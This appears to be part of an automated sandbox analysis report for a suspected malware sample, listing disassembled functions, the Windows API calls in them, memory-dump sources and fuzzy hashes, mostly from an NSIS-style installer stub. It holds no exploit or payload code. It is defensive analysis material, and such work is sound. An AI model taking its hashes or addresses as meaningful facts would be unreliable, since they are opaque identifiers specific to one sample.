                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                            • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                            • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                            Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406192,?,00000000,?,?,: Completed,?), ref: 00406128
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                            • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                            • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                                            • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                                            • Opcode Fuzzy Hash: f851741033878782bd382afd736986932f0f82490c74007ecaa1b2c921d2c013
                                                                                            • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                                            Function 0040425A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                            • Instruction ID: 075ccd8dd3a5a116662ee2c7ada5c50e1725780f7e4f2104ac300affc7ba1253
                                                                                            • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                                                            • Instruction Fuzzy Hash: 09C04CB1744201AADE108B609D45F0777585790740F158569B350E50E4C674E450D62D
                                                                                            Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                            • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                            • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                            • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                                                            Function 00403324 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 973152223-0
                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                            Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00404007), ref: 0040423A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                            • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                                                            • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                                                            • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19
                                                                                            Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                              • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,halituses,00000000,?,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                              • Part of subcall function 004052FF: lstrcatW.KERNEL32(halituses,00403257,00403257,halituses,00000000,?,762323A0), ref: 0040535A
                                                                                              • Part of subcall function 004052FF: SetWindowTextW.USER32(halituses,halituses), ref: 0040536C
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                                              • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                                              • Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                                                                              • Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D
                                                                                              • Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
                                                                                              • Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755
                                                                                              • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2972824698-0
                                                                                            • Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                                            • Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
                                                                                            • Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                                                                            • Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE

                                                                                            Non-executed Functions

                                                                                            Function 00404C7B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                                                                            • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                                                                            • DeleteObject.GDI32(00000000), ref: 00404D71
                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004050AB
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040524A
                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                                                                            • ShowWindow.USER32(00000000), ref: 0040525C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N
                                                                                            • API String ID: 1638840714-813528018
                                                                                            • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                            • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                                                                            • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                                                                            • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                                                                            Function 004046FF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                            • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
                                                                                            • lstrcatW.KERNEL32(?,: Completed), ref: 00404872
                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                              • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
